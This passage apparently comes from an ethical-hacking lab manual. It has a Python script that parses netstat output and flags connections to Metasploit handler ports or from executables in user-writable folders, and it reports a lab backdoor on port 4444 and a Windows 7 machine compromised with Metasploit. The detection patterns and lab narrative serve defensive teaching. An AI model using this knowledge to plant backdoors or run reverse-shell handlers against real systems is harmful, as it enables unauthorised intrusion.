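# 4444 is Metasploit's default LPORT; the other entries are assumed common choices, not from the lab.
HANDLER_PORTS = {4444, 4445, 1337}
# Lower-case path fragments marking user-writable locations a legitimate service binary would not run from.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# proto, local addr:port, foreign addr:port, optional state (absent for UDP), PID
NETSTAT_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$"
)


def parse_netstat(text):
    """Parse `netstat -ano` output into Conn tuples; header and blank lines are skipped."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, raddr, rport, state, pid = m.groups()
        conns.append(Conn(proto, laddr, int(lport), raddr, rport, state or "", int(pid)))
    return conns


def suspicious_connections(netstat_text, processes):
    """Return (pid, image, 'laddr:lport -> raddr:rport', [reasons]) for established, non-loopback
    TCP connections that hit a handler port or come from a binary in a user-writable path."""
    findings = []
    for c in parse_netstat(netstat_text):
        if c.proto != "TCP" or c.state != "ESTABLISHED" or c.raddr.startswith("127."):
            continue
        image = processes.get(c.pid, "<unknown>")
        reasons = []
        if c.rport.isdigit() and int(c.rport) in HANDLER_PORTS:
            reasons.append(f"remote port {c.rport} is a common handler port")
        if any(frag in image.lower() for frag in USER_WRITABLE):
            reasons.append("image runs from a user-writable path")
        if reasons:
            findings.append((c.pid, image, f"{c.laddr}:{c.lport} -> {c.raddr}:{c.rport}", reasons))
    return findings


if __name__ == "__main__":
    for pid, image, endpoints, reasons in suspicious_connections(SAMPLE_NETSTAT, SAMPLE_PROCESSES):
        print(f"PID {pid} {image} {endpoints}: " + "; ".join(reasons))
```

On a real host, feed the script the saved output of netstat -ano and a PID-to-path mapping from wmic or tasklist. In this lab the only finding is PID 2516, Backdoor.exe on the Desktop talking to 10.0.0.6:4444, with both reasons attached; the Firefox connection to port 443 from Program Files is left alone.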

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Metasploit
Information Collected/Objectives Achieved: Output: Hacked the Windows 7 machine and listed its directories

Internet Connection Required: ☐ Yes ☑ No
Platform Supported: ☑ Classroom ☑ iLabs
